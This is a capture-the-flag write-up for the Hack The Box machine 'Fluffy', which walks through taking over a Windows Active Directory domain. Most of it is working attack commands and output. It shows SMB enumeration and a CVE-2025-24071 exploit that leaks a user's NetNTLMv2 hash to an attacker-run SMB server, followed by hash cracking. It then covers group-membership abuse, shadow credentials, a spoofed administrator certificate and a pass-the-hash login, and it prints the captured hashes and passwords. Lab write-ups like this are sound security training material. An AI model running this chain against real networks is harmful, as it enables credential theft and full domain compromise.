🐕Fluffy

https://app.hackthebox.com/machines/662

Machine Information

As is common in real life Windows pentests, you will start the Fluffy box with credentials for the following account: j.fleischman / J0elTHEM4n1990!

Recon

change <ip>

[*] Running initial Nmap scan...
sudo nmap -sCV -T4 <ip> -oA nmap-initial                                                                    
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-24 21:02 CEST
Nmap scan report for fluffy.htb 
Host is up (0.024s latency).                               
Not shown: 989 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION        
53/tcp   open  domain        Simple DNS Plus          
88/tcp   open  kerberos-sec?                               
139/tcp  open  netbios-ssn?                                
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-05-25T02:04:07+00:00; +7h00m01s from scanner time.
| ssl-cert: Subject: commonName=DC01.fluffy.htb            
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.fluffy.htb
| Not valid before: 2025-04-17T16:04:17               
|_Not valid after:  2026-04-17T16:04:17                                                                               
445/tcp  open  microsoft-ds?                               
464/tcp  open  kpasswd5?                                   
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.fluffy.htb
| Not valid before: 2025-04-17T16:04:17
|_Not valid after:  2026-04-17T16:04:17
|_ssl-date: 2025-05-25T02:04:07+00:00; +7h00m01s from scanner time.
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-05-25T02:04:07+00:00; +7h00m01s from scanner time.
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.fluffy.htb
| Not valid before: 2025-04-17T16:04:17
|_Not valid after:  2026-04-17T16:04:17
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-05-25T02:04:07+00:00; +7h00m01s from scanner time.
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.fluffy.htb
| Not valid before: 2025-04-17T16:04:17
|_Not valid after:  2026-04-17T16:04:17
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found                                    
|_http-server-header: Microsoft-HTTPAPI/2.0
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port139-TCP:V=7.95%I=7%D=5/24%Time=683217CE%P=x86_64-pc-linux-gnu%r(Get
SF:Request,5,"\x83\0\0\x01\x8f");
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Using crackmap to check smb

change <ip>

➜ crackmapexec smb <ip> -u j.fleischman -p J0elTHEM4n1990! 
SMB         10.129.241.133  445    DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:fluffy.htb) (signing:True) (SMBv1:False)
SMB         10.129.241.133  445    DC01             [+] fluffy.htb\j.fleischman:J0elTHEM4n1990! 

We can access some shares

change <ip>

➜ smbclient -L //<ip> -U j.fleischman 
Password for [WORKGROUP\j.fleischman]:

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        IT              Disk      
        NETLOGON        Disk      Logon server share 
        SYSVOL          Disk      Logon server share 
        
➜ smbclient //<ip>/IT -U j.fleischman                                                                                                                                                                                     
Password for [WORKGROUP\j.fleischman]:
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Mon May 19 16:27:02 2025
  ..                                  D        0  Mon May 19 16:27:02 2025
  Everything-1.4.1.1026.x64           D        0  Fri Apr 18 17:08:44 2025
  Everything-1.4.1.1026.x64.zip       A  1827464  Fri Apr 18 17:04:05 2025
  KeePass-2.58                        D        0  Fri Apr 18 17:08:38 2025
  KeePass-2.58.zip                    A  3225346  Fri Apr 18 17:03:17 2025
  Upgrade_Notice.pdf                  A   169963  Sat May 17 16:31:07 2025

                5842943 blocks of size 4096. 2076907 blocks available
smb: \> get Upgrade_Notice.pdf 
getting file \Upgrade_Notice.pdf of size 169963 as Upgrade_Notice.pdf (976.3 KiloBytes/sec) (average 976.3 KiloBytes/sec)
smb: \> 

User/Root

Checking these vulns we getting a hash using this CVE

GitHub - ThemeHackers/CVE-2025-24071: Windows File Explorer Spoofing Vulnerability (CVE-2025-24071)GitHub

Change <vpn>

git clone https://github.com/ThemeHackers/CVE-2025-24071
cd CVE-2025-24071
python3 -m venv venv
source ./venv/bin/activate
pip install -r requirements.txt
python3 exploit.py -i <vpn> -f exploit

Hash receives after exploit

sudo impacket-smbserver share ./share -smb2support

change <ip>

smbclient //<ip>/IT -U j.fleischman%J0elTHEM4n1990! -c "put exploit.zip"

[..]
[*] User DC01\p.agila authenticated successfully
[*] p.agila::FLUFFY:aaaaaaaaaaaaaaaa:b62164f35a2f4a2b539ccfa42c91ec10:01010000000000008025f54461cddb01980ee0b30b898d7b000000000100100078006c0068004a005800620048006a000300100078006c0068004a005800620048006a000200100066006a0054006e0050004600730079000400100066006a0054006e005000460073007900070008008025f54461cddb01060004000200000008003000300000000000000001000000002000002daa84cffbaad1b43bd444a221def221fe09249d506c65fb13db8370004e60d70a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310034002e00360031000000000000000000
[..]

And cracking the hash

➜ cat hash 
p.agila::FLUFFY:aaaaaaaaaaaaaaaa:b62164f35a2f4a2b539ccfa42c91ec10:01010000000000008025f54461cddb01980ee0b30b898d7b000000000100100078006c0068004a005800620048006a000300100078006c0068004a005800620048006a000200100066006a0054006e0050004600730079000400100066006a0054006e005000460073007900070008008025f54461cddb01060004000200000008003000300000000000000001000000002000002daa84cffbaad1b43bd444a221def221fe09249d506c65fb13db8370004e60d70a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310034002e00360031000000000000000000

➜ hashcat --identify hash 
The following hash-mode match the structure of your input hash:

      # | Name                                                       | Category
  ======+============================================================+======================================
   5600 | NetNTLMv2                                                  | Network Protocol

➜ hashcat -m 5600 -a 0 hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting        

[..]

P.AGILA::FLUFFY:aaaaaaaaaaaaaaaa:b62164f35a2f4a2b539ccfa42c91ec10:01010000000000008025f54461cddb01980ee0b30b898d7b000000000100100078006c0068004a005800620048006a000300100078006c0068004a005800620048006a000200100066006a0054006e005000460073
0079000400100066006a0054006e005000460073007900070008008025f54461cddb01060004000200000008003000300000000000000001000000002000002daa84cffbaad1b43bd444a221def221fe09249d506c65fb13db8370004e60d70a00100000000000000000000000000000000000090020
0063006900660073002f00310030002e00310030002e00310034002e00360031000000000000000000:prometheusx-303
                                                                                                           

Checking with bloodhound this user

change <ip>

echo '<ip> fluffy.htb DC01.FLUFFY.HTB' | sudo tee -a /etc/hosts

/etc/krb5.conf

[libdefaults]
    default_realm = FLUFFY.HTB
    dns_lookup_realm = false
    dns_lookup_kdc = false
    ticket_lifetime = 24h
    forwardable = true
    renewable = true

[realms]
    FLUFFY.HTB = {
        kdc = <ip>
        admin_server = <ip>
    }

[domain_realm]
    .fluffy.htb = FLUFFY.HTB
    fluffy.htb = FLUFFY.HTB

➜ bloodhound-python -u 'p.agila' -p 'prometheusx-303' -d fluffy.htb -dc DC01.FLUFFY.HTB -c All -o bloodhound_results.json -ns <ip>

INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: fluffy.htb
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
INFO: Connecting to LDAP server: DC01.FLUFFY.HTB
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: DC01.FLUFFY.HTB
INFO: Found 10 users
INFO: Found 54 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC01.fluffy.htb
INFO: Done in 00M 07S

ADCS + Shadow Credentials + Certificate Abuse chain starting with adding agila to the service accounts

change <ip>

➜ bloodyAD --host <ip> -d fluffy.htb -u p.agila -p 'prometheusx-303' add groupMember 'Service Accounts' p.agila
[+] p.agila added to Service Accounts

Adding malicious KeyCredential to victim using GenericWrite

change <ip>

➜ sudo ntpdate <ip>
[sudo] password for kali: 
2025-05-25 21:00:47.346476 (+0200) +25299.397345 +/- 0.010498 10.129.164.175 s1 no-leap
CLOCK: time stepped by 25299.397345

➜ certipy-ad shadow auto -username P.AGILA@fluffy.htb -password 'prometheusx-303' -account ca_svc
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Targeting user 'ca_svc'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID '5fb2d338-1c91-6577-edb2-8a070b776431'
[*] Adding Key Credential with device ID '5fb2d338-1c91-6577-edb2-8a070b776431' to the Key Credentials for 'ca_svc'
[*] Successfully added Key Credential with device ID '5fb2d338-1c91-6577-edb2-8a070b776431' to the Key Credentials for 'ca_svc'
[*] Authenticating as 'ca_svc' with the certificate
[*] Using principal: ca_svc@fluffy.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'ca_svc.ccache'
[*] Trying to retrieve NT hash for 'ca_svc'
[*] Restoring the old Key Credentials for 'ca_svc'
[*] Successfully restored the old Key Credentials for 'ca_svc'
[*] NT hash for 'ca_svc': ca0f4f9e9eb8a092addf53bb03fc98c8

Authenticating as victim using certificate, setting UPN to administrator@domain(Spoofing) and requesting certificate with UPN=administrator(ESC1)

change <ip>

➜ export KRB5CCNAME=ca_svc.ccache

➜ certipy-ad account -u 'ca_svc' -hashes ':ca0f4f9e9eb8a092addf53bb03fc98c8' -dc-ip <ip> -user 'ca_svc' read
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Reading attributes for 'ca_svc':
    cn                                  : certificate authority service
    distinguishedName                   : CN=certificate authority service,CN=Users,DC=fluffy,DC=htb
    name                                : certificate authority service
    objectSid                           : S-1-5-21-497550768-2797716248-2627064577-1103
    sAMAccountName                      : ca_svc
    servicePrincipalName                : ADCS/ca.fluffy.htb
    
➜ certipy-ad account -u 'ca_svc' -hashes ':ca0f4f9e9eb8a092addf53bb03fc98c8' -dc-ip <ip> -upn 'administrator' -user 'ca_svc' update
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Updating user 'ca_svc':
    userPrincipalName                   : administrator
[*] Successfully updated 'ca_svc'

➜ sudo ntpdate <ip>                                                                                                               
2025-05-25 21:15:58.555036 (+0200) +25299.412195 +/- 0.011312 10.129.164.175 s1 no-leap
CLOCK: time stepped by 25299.412195
➜ certipy-ad req -u 'ca_svc' -hashes ':ca0f4f9e9eb8a092addf53bb03fc98c8' -dc-ip <ip> -target 'DC01.fluffy.htb' -ca 'fluffy-DC01-CA' -template 'User'
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 16
[*] Got certificate with UPN 'administrator'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'

➜ certipy-ad account -u 'ca_svc' -hashes ':ca0f4f9e9eb8a092addf53bb03fc98c8' -dc-ip <ip> -upn 'ca_svc@fluffy.htb' -user 'ca_svc' update
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Updating user 'ca_svc':
    userPrincipalName                   : ca_svc@fluffy.htb
[*] Successfully updated 'ca_svc'

➜ certipy-ad auth -pfx administrator.pfx -username 'administrator' -domain 'fluffy.htb' -dc-ip <ip>
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: administrator@fluffy.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@fluffy.htb': aad3b435b51404eeaad3b435b51404ee:8da83a3fa618b6e3a00e93f676c92a6e

➜ evil-winrm -i <ip> -u administrator -H '8da83a3fa618b6e3a00e93f676c92a6e'                                                       
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> 

Now we can get the user-flag at winrm_svc, which could have been taken before when we were adding the svc.